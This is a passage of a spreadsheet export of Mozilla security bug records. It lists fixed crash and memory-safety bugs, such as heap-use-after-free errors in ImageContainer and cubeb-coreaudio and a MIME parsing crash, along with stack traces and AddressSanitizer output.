Related crash report:
http://crash-stats.mozilla.com/report/index/fd5a722f-55ac-45d3-90e0-9a0872091028?p=1</t>
        </is>
      </c>
      <c r="X3153" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3154">
      <c r="A3154" t="n">
        <v>802168</v>
      </c>
      <c r="B3154" t="inlineStr">
        <is>
          <t>2012-10-16 08:19:18 -0700</t>
        </is>
      </c>
      <c r="C3154" t="inlineStr">
        <is>
          <t>Assertion failure: (next == this) == (prev == this) discarding images in LinkedList</t>
        </is>
      </c>
      <c r="D3154" t="inlineStr">
        <is>
          <t>2013-03-18 13:11:37 -0700</t>
        </is>
      </c>
      <c r="E3154" t="n">
        <v>1</v>
      </c>
      <c r="F3154" t="n">
        <v>1</v>
      </c>
      <c r="G3154" t="n">
        <v>3</v>
      </c>
      <c r="H3154" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3154" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3154" t="inlineStr">
        <is>
          <t>Graphics: ImageLib</t>
        </is>
      </c>
      <c r="K3154" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3154" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3154" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3154" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3154" t="inlineStr">
        <is>
          <t>[adv-track-main17+][adv-track-esr17+]</t>
        </is>
      </c>
      <c r="Q3154" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3154" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3154" t="inlineStr">
        <is>
          <t>mozilla19</t>
        </is>
      </c>
      <c r="T3154" t="n">
        <v>1</v>
      </c>
      <c r="U3154" t="n">
        <v>0</v>
      </c>
      <c r="V3154" t="n">
        <v>48</v>
      </c>
      <c r="W3154" t="inlineStr">
        <is>
          <t>1. http://epic.vn/
   Lots of other examples in automation.
2. Assertion failure: (next == this) == (prev == this), at c:\work\mozilla\builds\nightly\mozilla\firefox-debug\dist\include\mozilla/LinkedList.h:165
mozilla::LinkedListElement&lt;mozilla::image::DiscardTracker::Node&gt;::isInList() mozilla::image::RasterImage::DiscardingActive() mozilla::image::RasterImage::UnlockImage() imgRequestProxy::UnlockImage() nsDocument::RemoveImage(imgIRequest*, unsigned int)
Reproduced on Windows and Linux so far.
Also have seen Windows crashes at nsCOMPtr&lt;nsIWeakReference&gt;::~nsCOMPtr&lt;nsIWeakReference&gt;() | mozilla::image::RasterImage::~RasterImage() mozilla::image::RasterImage::`scalar deleting destructor'(unsigned int) + 0xe mozilla::image::RasterImage::Release() nsRefPtr&lt;mozilla::image::Image&gt;::~nsRefPtr&lt;mozilla::image::Image&gt;() imgRequest::~imgRequest()
that are rated low exploitable by breakpad.
There are a number of other stacks associated with this. Marking s-s.
Crashes OSX debug as well.</t>
        </is>
      </c>
      <c r="X3154" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3155">
      <c r="A3155" t="n">
        <v>1614971</v>
      </c>
      <c r="B3155" t="inlineStr">
        <is>
          <t>2020-02-12 07:53:00 -0800</t>
        </is>
      </c>
      <c r="C3155" t="inlineStr">
        <is>
          <t>Fix heap-use-after-free errors found by AddressSanitizer in cubeb-coreaudio</t>
        </is>
      </c>
      <c r="D3155" t="inlineStr">
        <is>
          <t>2020-06-05 00:38:07 -0700</t>
        </is>
      </c>
      <c r="E3155" t="n">
        <v>1</v>
      </c>
      <c r="F3155" t="n">
        <v>1</v>
      </c>
      <c r="G3155" t="n">
        <v>3</v>
      </c>
      <c r="H3155" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3155" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3155" t="inlineStr">
        <is>
          <t>Audio/Video: cubeb</t>
        </is>
      </c>
      <c r="K3155" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3155" t="inlineStr">
        <is>
          <t>Desktop</t>
        </is>
      </c>
      <c r="M3155" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3155" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3155" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3155" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main74+][adv-esr68.6+]</t>
        </is>
      </c>
      <c r="Q3155" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3155" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3155" t="inlineStr">
        <is>
          <t>mozilla75</t>
        </is>
      </c>
      <c r="T3155" t="n">
        <v>1</v>
      </c>
      <c r="U3155" t="n">
        <v>0</v>
      </c>
      <c r="V3155" t="n">
        <v>30</v>
      </c>
      <c r="W3155" t="inlineStr">
        <is>
          <t>See https://github.com/ChunMinChang/cubeb-coreaudio-rs/issues/48</t>
        </is>
      </c>
      <c r="X3155" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3156">
      <c r="A3156" t="n">
        <v>1243466</v>
      </c>
      <c r="B3156" t="inlineStr">
        <is>
          <t>2016-01-27 10:45:16 -0800</t>
        </is>
      </c>
      <c r="C3156" t="inlineStr">
        <is>
          <t>Heap-use-after-free crash [@mozilla::layers::ImageContainer::~ImageContainer]</t>
        </is>
      </c>
      <c r="D3156" t="inlineStr">
        <is>
          <t>2017-01-05 09:08:32 -0800</t>
        </is>
      </c>
      <c r="E3156" t="n">
        <v>1</v>
      </c>
      <c r="F3156" t="n">
        <v>1</v>
      </c>
      <c r="G3156" t="n">
        <v>3</v>
      </c>
      <c r="H3156" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3156" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3156" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K3156" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3156" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3156" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3156" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3156" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3156" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main47+][gfx-noted] maybe regressed by 1143575 (fx42)</t>
        </is>
      </c>
      <c r="Q3156" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3156" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3156" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3156" t="n">
        <v>1</v>
      </c>
      <c r="U3156" t="n">
        <v>0</v>
      </c>
      <c r="V3156" t="n">
        <v>45</v>
      </c>
      <c r="W3156" t="inlineStr">
        <is>
          <t>The following testcase crashes on en-us.linux-x86_64-asan.tar.bz2 revision 9a1977d9b21b1a4ba1fc5fdaff4240af83088271
See attachment.
Backtrace:
==13625==ERROR: AddressSanitizer: heap-use-after-free on address 0x6060004abf10 at pc 0x7f354fcc82a4 bp 0x7fffe60d4dd0 sp 0x7fffe60d4dc8
READ of size 8 at 0x6060004abf10 thread T0 (Web Content)
    #0 0x7f354fcc82a3 in Lock /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/Mutex.h:69
    #1 0x7f354fcc82a3 in BaseAutoLock /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/Mutex.h:164
    #2 0x7f354fcc82a3 in ForgetImageContainer /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/ImageContainer.cpp:109
    #3 0x7f354fcc82a3 in mozilla::layers::ImageContainer::~ImageContainer() /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/ImageContainer.cpp:151
    #4 0x7f3552cdcfe7 in Release /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/ImageContainer.h:349
    #5 0x7f3552cdcfe7 in AddRefTraitsReleaseHelper /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:362
    #6 0x7f3552cdcfe7 in Release /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:372
    #7 0x7f3552cdcfe7 in ~Mutex /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:56
    #8 0x7f3552cdcfe7 in mozilla::VideoFrameContainer::~VideoFrameContainer() /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/media/VideoFrameContainer.cpp:30
    #9 0x7f35528eb146 in Release /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/media/VideoFrameContainer.h:39
    #10 0x7f35528eb146 in AddRefTraitsReleaseHelper /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:362
    #11 0x7f35528eb146 in Release /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:372
    #12 0x7f35528eb146 in ~RefPtr /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:56
    #13 0x7f35528eb146 in mozilla::dom::HTMLMediaElement::~HTMLMediaElement() /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/html/HTMLMediaElement.cpp:2175
    #14 0x7f3552998d6e in ~HTMLVideoElement /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/html/HTMLVideoElement.cpp:51
    #15 0x7f3552998d6e in mozilla::dom::HTMLVideoElement::~HTMLVideoElement() /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/html/HTMLVideoElement.cpp:50
    #16 0x7f354de6ea88 in SnowWhiteKiller::~SnowWhiteKiller() /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2655
    #17 0x7f354de6e6ae in nsCycleCollector::FreeSnowWhite(bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/base/nsCycleCollector.cpp:2829
    #18 0x7f354f49e0c9 in AsyncFreeSnowWhite::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/js/xpconnect/src/XPCJSRuntime.cpp:151
    #19 0x7f354df8a8df in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:995
    #20 0x7f354e005bda in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #21 0x7f354e9af939 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:95
    #22 0x7f354e91b97c in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #23 0x7f354e91b97c in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #24 0x7f354e91b97c in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #25 0x7f3553d23a17 in nsBaseAppShell::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #26 0x7f3555c6c7a2 in XRE_RunAppShell /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:789
    #27 0x7f354e91b97c in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #28 0x7f354e91b97c in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #29 0x7f354e91b97c in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #30 0x7f3555c6be9a in XRE_InitChildProcess /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:625
    #31 0x48d760 in content_process_main(int, char**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:237
    #32 0x7f354b839ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
0x6060004abf10 is located 48 bytes inside of 64-byte region [0x6060004abee0,0x6060004abf20)
freed by thread T28 (ImageBridgeChil) here:
    #0 0x474ed1 in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:64
    #1 0x7f354ff36b44 in mozilla::layers::ImageBridgeChild::DeallocPImageContainerChild(mozilla::layers::PImageContainerChild*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/ipc/ImageBridgeChild.cpp:1057
    #2 0x7f354eba4fc7 in mozilla::layers::PImageBridgeChild::DeallocSubtree() /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/ipc/ipdl/PImageBridgeChild.cpp:1132
    #3 0x7f354eba55ea in mozilla::layers::PImageBridgeChild::OnChannelError() /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/ipc/ipdl/PImageBridgeChild.cpp:970
    #4 0x7f354e9aac9d in NotifyMaybeChannelError /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessageChannel.cpp:1864
    #5 0x7f354e9aac9d in mozilla::ipc::MessageChannel::OnNotifyMaybeChannelError() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessageChannel.cpp:1893
    #6 0x7f354e91cdf4 in RunTask /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:364
    #7 0x7f354e91cdf4 in MessageLoop::DeferOrRunPendingTask(MessageLoop::PendingTask const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:372
    #8 0x7f354e91dea7 in MessageLoop::DoWork() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:459
    #9 0x7f354e91ffc8 in base::MessagePumpDefault::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_pump_default.cc:34
    #10 0x7f354e91b97c in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #11 0x7f354e91b97c in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #12 0x7f354e91b97c in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #13 0x7f354e933923 in base::Thread::ThreadMain() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/thread.cc:172
    #14 0x7f354e9351dc in ThreadFunc(void*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/platform_thread_posix.cc:36
    #15 0x7f355c4b9181 in start_thread (/lib/x86_64-linux-gnu/libpthread.so.0+0x8181)
previously allocated by thread T0 (Web Content) here:
    #0 0x4750d1 in __interceptor_malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:74
    #1 0x48dd7d in moz_xmalloc /builds/slave/m-in-l64-asan-0000000000000000/build/src/memory/mozalloc/mozalloc.cpp:83
    #2 0x7f354fcc7c2f in operator new /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:186
    #3 0x7f354fcc7c2f in mozilla::layers::ImageContainer::ImageContainer(mozilla::layers::ImageContainer::Mode) /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/ImageContainer.cpp:137
    #4 0x7f354fcde1a7 in mozilla::layers::LayerManager::CreateImageContainer(mozilla::layers::ImageContainer::Mode) /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/Layers.cpp:204
    #5 0x7f35528f28c8 in mozilla::dom::HTMLMediaElement::GetVideoFrameContainer() /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/html/HTMLMediaElement.cpp:4030
    #6 0x7f3552b286c7 in mozilla::MediaDecoder::MediaDecoder(mozilla::MediaDecoderOwner*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/media/MediaDecoder.cpp:506
    #7 0x7f3552aa9467 in operator new /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/WebMDecoder.h:17
    #8 0x7f3552aa9467 in InstantiateDecoder /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/media/DecoderTraits.cpp:577
    #9 0x7f3552aa9467 in mozilla::DecoderTraits::CreateDecoder(nsACString_internal const&amp;, mozilla::MediaDecoderOwner*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/media/DecoderTraits.cpp:598
    #10 0x7f35528c9278 in mozilla::dom::HTMLMediaElement::InitializeDecoderForChannel(nsIChannel*, nsIStreamListener**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/html/HTMLMediaElement.cpp:2811
    #11 0x7f35528c895d in mozilla::dom::HTMLMediaElement::MediaLoadListener::OnStartRequest(nsIRequest*, nsISupports*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/dom/html/HTMLMediaElement.cpp:393
    #12 0x7f354e0fd20b in nsBaseChannel::OnStartRequest(nsIRequest*, nsISupports*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/netwerk/base/nsBaseChannel.cpp:800
    #13 0x7f354e145c7d in nsInputStreamPump::OnStateStart() /builds/slave/m-in-l64-asan-0000000000000000/build/src/netwerk/base/nsInputStreamPump.cpp:525
    #14 0x7f354e145242 in nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/netwerk/base/nsInputStreamPump.cpp:427
    #15 0x7f354df45db9 in nsInputStreamReadyEvent::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/io/nsStreamUtils.cpp:94
    #16 0x7f354df8a8df in nsThread::ProcessNextEvent(bool, bool*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/threads/nsThread.cpp:995
    #17 0x7f354e005bda in NS_ProcessNextEvent(nsIThread*, bool) /builds/slave/m-in-l64-asan-0000000000000000/build/src/xpcom/glue/nsThreadUtils.cpp:297
    #18 0x7f354e9af939 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:95
    #19 0x7f354e91b97c in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #20 0x7f354e91b97c in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #21 0x7f354e91b97c in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #22 0x7f3553d23a17 in nsBaseAppShell::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #23 0x7f3555c6c7a2 in XRE_RunAppShell /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:789
    #24 0x7f354e91b97c in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #25 0x7f354e91b97c in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #26 0x7f354e91b97c in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #27 0x7f3555c6be9a in XRE_InitChildProcess /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:625
    #28 0x48d760 in content_process_main(int, char**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:237
    #29 0x7f354b839ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
Thread T28 (ImageBridgeChil) created by T0 (Web Content) here:
    #0 0x461945 in pthread_create /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_interceptors.cc:175
    #1 0x7f354e933504 in CreateThread /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/platform_thread_posix.cc:135
    #2 0x7f354e933504 in Create /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/platform_thread_posix.cc:146
    #3 0x7f354e933504 in base::Thread::StartWithOptions(base::Thread::Options const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/thread.cc:94
    #4 0x7f354e93333e in base::Thread::Start() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/thread.cc:83
    #5 0x7f354ff32a5d in mozilla::layers::ImageBridgeChild::StartUpInChildProcess(IPC::Channel*, int) /builds/slave/m-in-l64-asan-0000000000000000/build/src/gfx/layers/ipc/ImageBridgeChild.cpp:713
    #6 0x7f354f1b1766 in mozilla::dom::PContentChild::OnMessageReceived(IPC::Message const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/ipc/ipdl/PContentChild.cpp:8427
    #7 0x7f354e9a8a9c in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessageChannel.cpp:1461
    #8 0x7f354e9a644c in mozilla::ipc::MessageChannel::DispatchMessage(IPC::Message const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessageChannel.cpp:1381
    #9 0x7f354e9973c2 in mozilla::ipc::MessageChannel::OnMaybeDequeueOne() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessageChannel.cpp:1350
    #10 0x7f354e91cdf4 in RunTask /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:364
    #11 0x7f354e91cdf4 in MessageLoop::DeferOrRunPendingTask(MessageLoop::PendingTask const&amp;) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:372
    #12 0x7f354e91dea7 in MessageLoop::DoWork() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:459
    #13 0x7f354e9b0635 in mozilla::ipc::MessagePumpForChildProcess::Run(base::MessagePump::Delegate*) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/glue/MessagePump.cpp:284
    #14 0x7f354e91b97c in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #15 0x7f354e91b97c in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #16 0x7f354e91b97c in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #17 0x7f3553d23a17 in nsBaseAppShell::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/widget/nsBaseAppShell.cpp:156
    #18 0x7f3555c6c7a2 in XRE_RunAppShell /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:789
    #19 0x7f354e91b97c in RunInternal /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:234
    #20 0x7f354e91b97c in RunHandler /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:227
    #21 0x7f354e91b97c in MessageLoop::Run() /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/chromium/src/base/message_loop.cc:201
    #22 0x7f3555c6be9a in XRE_InitChildProcess /builds/slave/m-in-l64-asan-0000000000000000/build/src/toolkit/xre/nsEmbedFunctions.cpp:625
    #23 0x48d760 in content_process_main(int, char**) /builds/slave/m-in-l64-asan-0000000000000000/build/src/ipc/app/../contentproc/plugin-container.cpp:237
    #24 0x7f354b839ec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
SUMMARY: AddressSanitizer: heap-use-after-free /builds/slave/m-in-l64-asan-0000000000000000/build/src/obj-firefox/dist/include/mozilla/Mutex.h:69 Lock
Shadow bytes around the buggy address:
  0x0c0c8008d790: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c0c8008d7a0: fa fa fa fa fa fa fa fa fa fa fa fa fd fd fd fd
  0x0c0c8008d7b0: fd fd fd fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c0c8008d7c0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c0c8008d7d0: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
=&gt;0x0c0c8008d7e0: fd fd[fd]fd fa fa fa fa fd fd fd fd fd fd fd fa
  0x0c0c8008d7f0: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c0c8008d800: fd fd fd fd fd fd fd fa fa fa fa fa fd fd fd fd
  0x0c0c8008d810: fd fd fd fa fa fa fa fa fd fd fd fd fd fd fd fa
  0x0c0c8008d820: fa fa fa fa fd fd fd fd fd fd fd fa fa fa fa fa
  0x0c0c8008d830: fd fd fd fd fd fd fd fa fa fa fa fa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t>
        </is>
      </c>
      <c r="X3156" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3157">
      <c r="A3157" t="n">
        <v>111305</v>
      </c>
      <c r="B3157" t="inlineStr">
        <is>
          <t>2001-11-21 14:03:55 -0800</t>
        </is>
      </c>
      <c r="C3157" t="inlineStr">
        <is>
          <t>N620 crash [@ .__ptr_glue - MimeMultipart_parse_line]</t>
        </is>
      </c>
      <c r="D3157" t="inlineStr">
        <is>
          <t>2008-07-31 01:23:32 -0700</t>
        </is>
      </c>
      <c r="E3157" t="n">
        <v>1</v>
      </c>
      <c r="F3157" t="n">
        <v>1</v>
      </c>
      <c r="G3157" t="n">
        <v>3</v>
      </c>
      <c r="H3157" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3157" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J3157" t="inlineStr">
        <is>
          <t>MIME</t>
        </is>
      </c>
      <c r="K3157" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3157" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3157" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3157" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3157" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3157" t="inlineStr">
        <is>
          <t>Have fix,AOLTW+,AOLTWOK</t>
        </is>
      </c>
      <c r="Q3157" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3157" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3157" t="inlineStr">
        <is>
          <t>mozilla1.0</t>
        </is>
      </c>
      <c r="T3157" t="n">
        <v>1</v>
      </c>
      <c r="U3157" t="n">
        <v>0</v>
      </c>
      <c r="V3157" t="n">
        <v>30</v>
      </c>
      <c r="W3157" t="inlineStr">
        <is>
          <t>This is one of the topcrasher with Netscape 6.20 on Mac. Here is the latest info
we have from Talkback on this crash:
[ 24   .__ptr_glue 4ab20c49 - MimeMultipart_parse_line() ]
     Crash date range: 2001-11-10 to 2001-11-20
     Min/Max Seconds since last crash: 39 - 205769
     Min/Max Runtime: 61 - 757994
     Keyword List : attach(7), mail(16), message(5), forward(10),  
     Count   Platform List 
     9   MacOS version 9.1  
     7   MacOS version 9.2.1  
     7   MacOS version 9.0.4  
     1   MacOS version 8.6  
     Count   Build Id List 
     24   2001102217
     No of Unique Users        15
 Stack trace(Frame) 
	 .__ptr_glue  
	 MimeMultipart_parse_line()
[mimemult.cpp  line 204] 
	 convert_and_send_buffer()
[mimebuf.cpp  line 168] 
	 mime_LineBuffer()
[mimebuf.cpp  line 186] 
	 MimeObject_parse_buffer()
[mimeobj.cpp  line 249] 
	 MimeMultipart_parse_child_line()
[mimemult.cpp  line 547] 
	 MimeMultipart_parse_line()
[mimemult.cpp  line 261] 
	 convert_and_send_buffer()
[mimebuf.cpp  line 168] 
	 mime_LineBuffer()
[mimebuf.cpp  line 186] 
	 MimeObject_parse_buffer()
[mimeobj.cpp  line 249] 
	 MimeMessage_parse_line()
[mimemsg.cpp  line 211] 
	 convert_and_send_buffer()
[mimebuf.cpp  line 168] 
	 mime_LineBuffer()
[mimebuf.cpp  line 262] 
	 MimeObject_parse_buffer()
[mimeobj.cpp  line 249] 
	 mime_parse_stream_write()
[mimedrft.cpp  line 414] 
	 nsStreamConverter::OnDataAvailable()
[nsStreamConverter.cpp  line 901]  
     (38267786)	Comments: Editing one deleted message as a new one.  The browser just
stopped working.
     (38233282)	Comments: I was forwarding an e-mail that included an attachment.
     (38222620)	Comments: Composing a e-mail message. I cut and pasted some text  which
